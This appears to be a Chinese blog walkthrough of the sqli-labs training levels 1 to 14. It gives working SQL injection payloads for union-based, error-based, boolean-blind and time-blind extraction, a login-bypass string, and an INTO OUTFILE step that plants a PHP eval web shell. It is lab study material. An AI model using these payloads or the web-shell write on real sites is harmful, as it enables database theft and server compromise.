本人萌新，有什么错误的地方希望各位指正，废话不多说

---

在开始之前，为了方便看到构造的查询语句可以在源码中加一句

echo"你的sql语句为".$sql."<br>"

---

Less-1

注入点测试
首先先添加一个'查看返回信息

192.168.133.129/sqli/Less-1/?id=1'

返回报错信息，表示存在sql注入漏洞
sql语句如下:SELECT * FROM users WHERE id='1'' LIMIT 0,1

第一步首先先看查询了几个字段，使用"order by (number)"【因为后面的查询需要用到union，所以这个地方需要猜查询了多少字段】

---

在这之前首先需要人为的构造sql语句使之闭合，正常进行查询
这里说两种可能遇到的sql语句注释符

1. --【空格】 这里的空格一定要有。
2.#

有时候需要进行url编码具体的可以自己去百度

---

这里输入

192.168.133.129/sqli/Less-1/?id=1'order by 4 --%20

image.png

可以知道前面查询的字段是小于4的

192.168.133.129/sqli/Less-1/?id=1'order by 3 --%20

image.png

那么现在就可以知道查询的字段有3个

第二步查看目标字段在哪个位置显示

【因为sqlib中只能显示1组数据，所以我们需要将前面的主查询改为负或者改为一个较大的数，来使前面的查询为空，从而为后面构造的union查询让出地方】

image.png

第三步 将上面的2，3 进行替换

user()
database()
version()
@@datadir    当前数据库物理地址
@@hostname   这台主机名
@@VERSION   数据库版本
@@version_compile_os  查看操作系统

这里我查的是

• 数据库版本信息
• 当前数据库

image.png

现在可以知道数据库版本为5.5.53；当前数据库为 security。

• MySQL 5.0及以上版本提供了INFORMATION_SCHEMA这个信息数据库

mysql数据库information_schema，他是系统数据库，默认安装完就存在，其中记录的是当前数据库的数据库，表，列(字段)，用户权限等信息，下面说一下常用的几个表

• SCHEMA表存储mysql所有数据库的基本信息，包括数据库名，编码类型，路径等，show databases的结果取之于此。
• TABLES表：存储mysql 中的表信息，这个表示基本表还是系统表，数据库引擎是什么，表有多少行，创建时间，最后更新时间 show tables from schemaname的结果取之于此
• COLUMNS表：提供表中的的咧信息，详细表述了某张表的所有列以及每个列的信息，包括该列是那个表中的第几列，列的数据类型，lieder编码类型，列的权限，列的注释等 是show columns form schemaname.tablename的结果取于此表

接下来查询表名

192.168.133.129/sqli/Less-1/?id=-1'union select 1,2,table_name from information_schema.tables where table_schema='security' limit 3,1--%20

可以查询到users表，猜测里面可能有我们想要的账号以及密码

接下来继续查询我们想要的表中的字段

192.168.133.129/sqli/Less-1/?id=-1'union select 1,2,column_name from information_schema.columns where table_name='users' limit 1,1--%20

• 经过测试我们可以知道有几个字段有username，password，可能就是我们想要的用户名密码

最后我们可以根据字段直接在users表中进行查询（我这里只是做一个演示，剩下的可以自己去遍历）

image.png

Less-2

跟第一关少了单引号闭合，这里就不多解释了

Less-3

第三关是被单引号括号包裹的，这里需要手工把单引号括号闭合，才能继续往下做

Less-4

第四关是被双引号括号包裹的，这里需要手工把双引号括号闭合，才能继续往下做

Less-5

-第五关一看不管输入什么没有显示，但是显示报错信息，所以这个地方考虑使用报错注入（报错注入无法使用group_concat()只能使用limit来遍历）

192.168.133.129/sqli/Less-5/?id=-1' union select count(*),1,concat('$',(select table_name from information_schema.tables where table_schema='security' limit 3,1),'$',floor(rand()*2))as a from information_schema.tables group by a%23

• count(*)、rand()、group by三者缺一不可

floor()是取整数
rand()在0和1之间产生一个随机数
rand(0)*2将取0到2的随机数
floor(rand()*2)有两条记录就会报错
floor(rand(0)*2)记录需为3条以上并且3条以上必报错，返回的值是有规律的
count(*)是用来统计结果的
group by在对数据进行分组时会先看看虚拟表里有没有这个值，没有的话就插入;存在的话count(*)加1

Less-6

第六关是把单引号换为双引号

Less-7

这关就比较尴尬，不进行注入直接写一句话，采用into outfile 进行文件写入

127.0.0.1/s/Less-7/?id=1′)) union select 1,'<?php eval($_POST[“chopper”]);?>’,3 into outfile
‘C:\phpStudy\WWW\q.php’%23

Load_file进行文件读取

http://127.0.0.1/s/Less-7/?id=1′)) union select 1,load_file(“C:/phpStudy/www/s/Less-7/result.txt”),3
into outfile ‘C:\phpStudy\WWW\123.php’%23 

Less-8

第八关，首先尝试没有任何报错，什么也不现实，所以我们要尝试盲注

• 布尔类型的盲注
  mysql相关的函数：
  lengrh（str）：返回str字符串长度
  subste（str,pos,len）将str从pos位置开始截取len长度的字符进行返回，注意这里的pos位置是从1开始的，不是数字0开始
  mid（str，pos，len）跟上面一样截取字符串
  ascii（str）返回字符串str的最左面字符的ascii代码值
  ord（str）同上，返回ascii码
  if（a,b,c）:a为条件，a为true，返回b，否则返回c，比如if（1>2，1，0）这里返回0

构造语句：

192.168.133.129/sqli/Less-8/?id=1' and if(ascii(substr((select database()),1,1))>115,1,0)%23

或者不用if函数

192.168.133.129/sqli/Less-8/?id=1' and ascii(substr((select database()),1,1))>114 %23

如果判断的值是正确的那么就会显示正常的页面

接下来是用二分法一点一点猜

http://localhost/123/Less-8/?id=1' and ascii(substr((select database()),1,1)>64 %23 返回正确，大于64 
http://localhost/123/Less-8/?id=1' and ascii(substr((select database()),1,1))>96 %23 返回正确，大于96 
http://localhost/123/Less-8/?id=1' and ascii(substr((select database()),1,1))<123 %23 返回正确，小于123 ，区间在97-122 
http://localhost/123/Less-8/?id=1' and ascii(substr((select database()),1,1))>109 %23 返回正确，大于109，区间在110-122 
http://localhost/123/Less-8/?id=1' and ascii(substr((select database()),1,1))>116 %23 返回错误，所以在110-116之间 
http://localhost/123/Less-8/?id=1' and ascii(substr((select database()),1,1))>112 %23 返回正确，大于112，区间在113-116之间 
http://localhost/123/Less-8/?id=1' and ascii(substr((select database()),1,1))>114 %23 返回正确，大于114，间在115-116之间 
http://localhost/123/Less-8/?id=1' and ascii(substr((select database()),1,1))>115 %23 返回错误，不大于115，即第一个字母的ascii为 115，即字母s

忙注的过程是很漫长的，一般自己写脚本或者用工具辅助

Less-9

第九关不论输入什么都只输出 you are in ____

布尔类型也解决布料，只能尝试基于时间的盲注

• 判断时间盲注的可能性，如果感觉比正常访问满10s左右，那么表示存在注入点

192.168.133.129/sqli/Less-9/?id=1' and sleep(10) %23

192.168.133.129/sqli/Less-9/?id=1' and if(ascii(substr((select database()),1,1))>115,sleep(10),0)%23

Less-10

原理同上，只不过把单引号变为双引号

less-11

打开一看到是一个登陆的页面，于是联想到万能密码

于是构造万能密码' or 1=1 limit 2,1%23，发现不行报错信息中可以知道%23并未被服务器所解析，所以我们换成#；' or 1=1 limit 2,1#继续往下查询，很简单。

less-12

同上，原理相同，把单引号换成括号双引号

less-13

---

着实被这个题目坑了一把，怎么注入都是搞不出数据，很纳闷，语句没问题就是不出数据，结果经过别人告诉我说这个下面图片变了，我才知道根本就没有数据显示，都是骗人的！！！

image.png

---

同上，原理相同，把单引号换成括号单引号

less-14

同上，原理相同，把单引号换成双引号